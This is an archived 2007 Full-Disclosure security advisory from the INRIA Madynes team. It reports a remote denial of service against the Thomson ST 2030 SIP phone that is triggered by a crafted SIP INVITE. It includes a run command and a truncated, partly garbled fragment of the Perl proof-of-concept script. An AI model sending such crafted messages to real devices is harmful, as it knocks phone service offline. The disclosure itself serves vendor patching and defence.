Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Radu State (Stateloria.fr)
Date: Mon Aug 27 2007 - 05:11:41 CDT
MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030
Date of Discovery 15 February, 2007
Vendor was notified on 1 March 2007
After sending a message where the TO URI field is crafted, the device looks
functional but in fact does not respond to any event provoking a DoS.
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session.
Affected devices: Thomson SIP phone ST 2030
A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP message.
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
Configuration of our device:
Software Version: v1.52.1
IP-Address obtained by DHCP as 192.168.1.106
User name : thomson
To run the exploit the file thomson-2030-2.pl should be launched (assuming
our configurations) as:
perl thomson-2030-2.pl 192.168.1.106 5060 thomson
#Vulneravility for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
die "Usage $0 <dst> <port> <username>" unless ($ARGV);
$msg = "INVITE sip:$ARGV\$ARGV SIP/2.0\r\nVia: SIP/2.0/UDP
<A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\192.168.1.2\r\nCSeq: 1
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/